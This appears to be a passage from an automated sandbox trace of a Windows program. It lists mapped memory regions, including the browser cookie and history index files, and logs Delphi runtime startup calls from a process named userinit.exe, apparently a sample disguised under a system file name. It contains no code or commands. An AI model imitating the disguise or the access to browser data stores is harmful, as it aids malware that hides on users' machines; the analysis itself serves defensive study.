filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 3384
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 3385
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 3386
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3387
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 3388
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 3389
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x100000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 3390
start_va = 0x2950000
end_va = 0x2a4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 3391
start_va = 0x320000
end_va = 0x320fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 3392
start_va = 0x6ceb0000
end_va = 0x6cec8fff
entry_point = 0x6ceb0000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 3393
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 3394
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 3395
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 3396
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 3405
start_va = 0x2a70000
end_va = 0x2b6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a70000"
filename = ""
Region:
id = 3406
start_va = 0x2bb0000
end_va = 0x2beffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002bb0000"
filename = ""
Region:
id = 3407
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 3408
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 3409
start_va = 0x2bf0000
end_va = 0x2ebefff
entry_point = 0x2bf0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3410
start_va = 0x330000
end_va = 0x331fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 3411
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 3412
start_va = 0x350000
end_va = 0x350fff
entry_point = 0x350000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 3413
start_va = 0x390000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 3429
start_va = 0x360000
end_va = 0x361fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000360000"
filename = ""
Region:
id = 3430
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3431
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 3432
start_va = 0x350000
end_va = 0x350fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000350000"
filename = ""
Region:
id = 3433
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 3434
start_va = 0x3d0000
end_va = 0x3fbfff
entry_point = 0x3d0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 3435
start_va = 0x370000
end_va = 0x377fff
entry_point = 0x370000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 3436
start_va = 0x380000
end_va = 0x38ffff
entry_point = 0x380000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 3437
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3438
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3439
start_va = 0x2ec0000
end_va = 0x2f7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ec0000"
filename = ""
Region:
id = 3440
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 3441
start_va = 0xf60000
end_va = 0xfdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000f60000"
filename = ""
Region:
id = 3442
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 3443
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 3448
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 3449
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 3450
start_va = 0x2f80000
end_va = 0x303ffff
entry_point = 0x2f80000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 235
os_tid = 0xfa0
[0107.191] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0107.191] GetKeyboardType (nTypeFlag=0) returned 4
[0107.191] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0107.191] GetStartupInfoA (in: lpStartupInfo=0x24fb9c | out: lpStartupInfo=0x24fb9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0107.191] GetVersion () returned 0x1db10106
[0107.191] GetVersion () returned 0x1db10106
[0107.192] GetCurrentThreadId () returned 0xfa0
[0107.192] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x24f698, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0107.192] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f573, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0107.192] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24f688 | out: phkResult=0x24f688*=0x0) returned 0x2
[0107.192] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24f688 | out: phkResult=0x24f688*=0x0) returned 0x2
[0107.192] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24f688 | out: phkResult=0x24f688*=0x0) returned 0x2
[0107.192] lstrcpynA (in: lpString1=0x24f573, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0107.192] GetThreadLocale () returned 0x409
[0107.192] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x24f683, cchData=5 | out: lpLCData="ENU") returned 4
[0107.193] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0107.193] lstrcpynA (in: lpString1=0x24f590, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0107.193] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0107.193] lstrcpynA (in: lpString1=0x24f590, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0107.193] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0107.193] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0107.193] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x123640
[0107.193] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x660000
[0107.194] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x124640
[0107.194] VirtualAlloc (lpAddress=0x660000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x660000
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0107.194] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x24f7bc, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0107.195] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x24f7a8, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0107.195] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x24f7a8, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0107.195] GetVersionExA (in: lpVersionInformation=0x24fb40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24fb40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0107.195] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0107.195] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0107.195] GetThreadLocale () returned 0x409
[0107.195] GetThreadLocale () returned 0x409
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Jan") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x24fa18, cchData=256 | out: lpLCData="January") returned 8
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Feb") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x24fa18, cchData=256 | out: lpLCData="February") returned 9
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Mar") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x24fa18, cchData=256 | out: lpLCData="March") returned 6
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Apr") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x24fa18, cchData=256 | out: lpLCData="April") returned 6
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x24fa18, cchData=256 | out: lpLCData="May") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x24fa18, cchData=256 | out: lpLCData="May") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Jun") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x24fa18, cchData=256 | out: lpLCData="June") returned 5
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Jul") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x24fa18, cchData=256 | out: lpLCData="July") returned 5
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Aug") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x24fa18, cchData=256 | out: lpLCData="August") returned 7
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Sep") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x24fa18, cchData=256 | out: lpLCData="September") returned 10
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Oct") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x24fa18, cchData=256 | out: lpLCData="October") returned 8
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Nov") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x24fa18, cchData=256 | out: lpLCData="November") returned 9
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Dec") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x24fa18, cchData=256 | out: lpLCData="December") returned 9
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Sun") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Sunday") returned 7
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Mon") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Monday") returned 7
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Tue") returned 4
[0107.195] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Tuesday") returned 8
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Wed") returned 4
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Wednesday") returned 10
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Thu") returned 4
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Thursday") returned 9
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Fri") returned 4
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Friday") returned 7
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Sat") returned 4
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x24fa18, cchData=256 | out: lpLCData="Saturday") returned 9
[0107.196] GetThreadLocale () returned 0x409
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x24fa74, cchData=256 | out: lpLCData="$") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x24fa74, cchData=256 | out: lpLCData="0") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x24fa74, cchData=256 | out: lpLCData="0") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x24fb6c, cchData=2 | out: lpLCData=",") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x24fb6c, cchData=2 | out: lpLCData=".") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x24fa74, cchData=256 | out: lpLCData="2") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x24fb6c, cchData=2 | out: lpLCData="/") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x24fa74, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0107.196] GetThreadLocale () returned 0x409
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x24fa40, cchData=256 | out: lpLCData="1") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x24fa74, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0107.196] GetThreadLocale () returned 0x409
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x24fa40, cchData=256 | out: lpLCData="1") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x24fb6c, cchData=2 | out: lpLCData=":") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x24fa74, cchData=256 | out: lpLCData="AM") returned 3
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x24fa74, cchData=256 | out: lpLCData="PM") returned 3
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x24fa74, cchData=256 | out: lpLCData="0") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x24fa74, cchData=256 | out: lpLCData="0") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x24fa74, cchData=256 | out: lpLCData="0") returned 2
[0107.196] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x24fb6c, cchData=2 | out: lpLCData=",") returned 2
[0107.197] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0107.197] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0107.198] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0107.198] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0107.198] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0107.199] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0107.199] GetDC (hWnd=0x0) returned 0x1201087d
[0107.199] GetDeviceCaps (hdc=0x1201087d, index=90) returned 96
[0107.199] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0107.199] GetDC (hWnd=0x0) returned 0x1201087d
[0107.199] GetDeviceCaps (hdc=0x1201087d, index=104) returned 0
[0107.199] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0107.199] CreatePalette (plpal=0x24f7d0) returned 0x1508087a
